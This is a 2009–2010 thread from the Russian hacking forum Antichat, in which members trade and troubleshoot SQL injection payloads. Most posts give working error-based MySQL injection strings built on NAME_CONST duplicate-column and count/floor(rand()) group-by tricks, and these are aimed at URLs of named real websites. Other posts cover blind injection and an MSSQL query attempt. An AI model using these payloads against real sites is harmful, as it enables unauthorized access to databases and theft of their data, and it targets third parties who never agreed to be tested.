ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
31.12.2009, 02:02
|
|
Новичок
Регистрация: 30.10.2009
Сообщений: 21
Провел на форуме:
182669
Репутация:
24
|
|
character=12589)+and+1=(select+*+from(select+*+fro m(select+name_const((version()),14)d)+as+t+join+(s elect+name_const((version()),14)e)b)a)--+
Не совсем понял как работает эта inj (
|
|
|
29.12.2009, 11:09
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
v1d0qz
http://www.drservice.ru/service-centers/nn/NNovgorod/drservice52/'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)--'
|
|
|
|
29.12.2009, 16:11
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
29.12.2009, 16:56
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
сорри но там нету решение как в\обойти если не выводится инфо с колонок
пример:
(%53elect+top+1+Post_count+from+Total)--
всегда ответ одинаковый
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
|
|
|
|
01.01.2010, 15:03
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от Strilo4ka
Почему то не получаеться! Может у кого нить получиться:
Ошибка: .
у тебя в запросе сразу 2 ошибки: конечный подзапрос возвращает 2 пустых поля, из-за этого в первом подзапросе 1=(select * ... ) используются 2 колонки
квазар составил длинный пример на основе предыдущего способа вывода имен колонок, но его можно записать и покороче:
http://zero10.us/m.php?id=2435+or(1,2)=(select*from(select+name_con st(version(),1),name_const(version(),1))a)
а ещё лучше переходить на другой способ:
http://zero10.us/m.php?id=2435+or(1,2)=(select+count(*),concat(vers ion(),floor(rand(0)*2))from(information_schema.tab les)+group+by+2)
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
|
29.12.2009, 19:01
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
jokester
Так и знал что там можно всё через дупликат красиво оформить.
Сообщение от v1d0qz
Вот же допустим выводиться..
http://www.drs ervice.ru/service-centers/nn/NNovgorod/drservice52/'and+1=1='2/
Сообщение от Bramin
да не хрена там не выводится и не будет т.к это бред то что ты пишешь.
читай http://forum.antichat.ru/thread19844.html
Ой сорри, было очень поздно, на втыке написал)
там должно было быть
http://www.drs ervice.ru/service-centers/nn/NNovgorod/drservice52/'and+1='2/
Вы главное не нервничайте, всё будет хорошо 
Последний раз редактировалось v1d0qz; 18.04.2010 в 13:47..
|
|
|
|
30.12.2009, 14:34
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Сообщение от Strilo4ka
Qwazar Спасиба огромное... Вот почитал пост тут . Прикольно под все ветки ну ты мозг  . Мне тока одно интересно. Чтоб такая ошибка в браузере вывелась, то должен быть вывод ошибок СУБД а обычно кодера это делают когда отлаживают приложение а потом убирают, хоть и вывод ошибок не подавлен или подавлен(в хтаксесс, в пхп ини, в конф апача, в скрипте во время выполнения это роль не имеет)...
В смысле должно быть после mysql_query, допустим или mysql_fetch_assoc или других подобных функций
что то такого типо Если после ,например, mysql_fetch_assoc то и пути могут появиться!!!
Тоесть метод работает не у всех блиндах , тоже самое касаеться и ExtractValue и select 1 union select 2 и тому подобных, и определения колонок если не null...
Условия:
1) сообщения от СУБД для всех етих методов (которые обычно убирают после отладки)
Я прав???
Не полностью.На то она и блин,что вывода нет.Чаще всего и вывода ошибок нет,просто белый экран например,но это для нас тоже ошибка! С помощью if() мы чтото сравниваем,и если есть данные - тру,булеый экран - фалсе.
|
|
|
|
30.12.2009, 14:41
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Сообщение от Strilo4ka
я это знаю я за методы кавазара , дмитрия евтеева там должен быть. Ну так то понятно если нет принтабельных полей то можно логикой работатать все же блинд есть...
Ну да, там должно быть что нибудь типа or die(mysql_error())
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
29.12.2009, 17:37
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
YuNi|[c, там в целом речь о MySQL.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
29.12.2009, 22:57
|
|
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617
Репутация:
245
|
|
Не могу раскрутить скуль
https://hiphop-dojo.com/order/cart.php?id=939'
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
